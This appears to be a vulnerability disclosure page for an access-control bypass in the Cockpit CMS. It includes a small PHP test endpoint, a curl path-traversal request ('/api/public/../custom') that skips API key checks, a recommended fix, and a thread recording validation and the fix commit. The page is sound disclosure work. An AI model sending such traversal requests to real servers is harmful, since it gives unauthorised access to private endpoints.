Improper Access Control in agentejo/cockpit

Valid

Reported on

Sep 9th 2021

✍️ Description

A local file inclusion vulnerability allows attackers to bypass the need for API Keys when querying private custom API endpoints

🕵️‍♂️ Proof of Concept

On the server create a custom API endpoint in /var/www/html/config/api/custom.php as follows:

<?php

// very simple code here

$test = $this->param('test');

if (!$test) {
return false;
}

return $test;

Then execute the following command, replacing IP:Port with your server:

curl --path-as-is http://10.0.2.15:8080/api/public/../custom?test=win

You should see 'win' echo back, which proves we can access custom.php in the api directory without API tokens.

💥 Impact

Attackers do not require API tokens to access private custom API endpoints

Recommended Fix

For the 'path' parameter in the following file https://github.com/agentejo/cockpit/blob/568b0124352f6d27df359e8c19a70d2dd1961e87/modules/Cockpit/rest-api.php#L117L123, use a regex statement to only allow alphanumeric characters as well as / and _

📍 Location rest-api.php#L117L123

References

https://github.com/agentejo/cockpit/blob/568b0124352f6d27df359e8c19a70d2dd1961e87/modules/Cockpit/rest-api.php#L117L123

We have contacted a member of the agentejo/cockpit team and are waiting to hear back 2 years ago

haxatron modified the report

2 years ago

haxatron modified the report

2 years ago

haxatron modified the report

2 years ago

haxatron modified the report

2 years ago

haxatron modified the report

2 years ago

A agentejo/cockpit maintainer

commented 2 years ago

should be fixed with this commit: https://github.com/agentejo/cockpit/commit/f1919184998bf9fa7a7db882c98ce1410375e596

haxatron

commented 2 years ago

Researcher

Hi there! Thanks! Could you validate the report?

Artur validated this vulnerability 2 years ago

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

Artur marked this as fixed with commit f19191 2 years ago

Artur has been awarded the fix bounty

This vulnerability will not receive a CVE

Jamie Slome

commented 2 years ago

Admin

@maintainer - the researcher has requested a CVE. Are you also happy for a CVE to be assigned here?

to join this conversation

We have contacted a member of the agentejo/cockpit team and are waiting to hear back 2 years ago

haxatron modified the report

2 years ago

haxatron modified the report

2 years ago

haxatron modified the report

2 years ago

haxatron modified the report

2 years ago

haxatron modified the report

2 years ago

A agentejo/cockpit maintainer

commented 2 years ago

should be fixed with this commit: https://github.com/agentejo/cockpit/commit/f1919184998bf9fa7a7db882c98ce1410375e596

haxatron

commented 2 years ago

Researcher

Hi there! Thanks! Could you validate the report?

Artur validated this vulnerability 2 years ago

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

Artur marked this as fixed with commit f19191 2 years ago

Artur has been awarded the fix bounty

This vulnerability will not receive a CVE

Jamie Slome

commented 2 years ago

Admin

@maintainer - the researcher has requested a CVE. Are you also happy for a CVE to be assigned here?

to join this conversation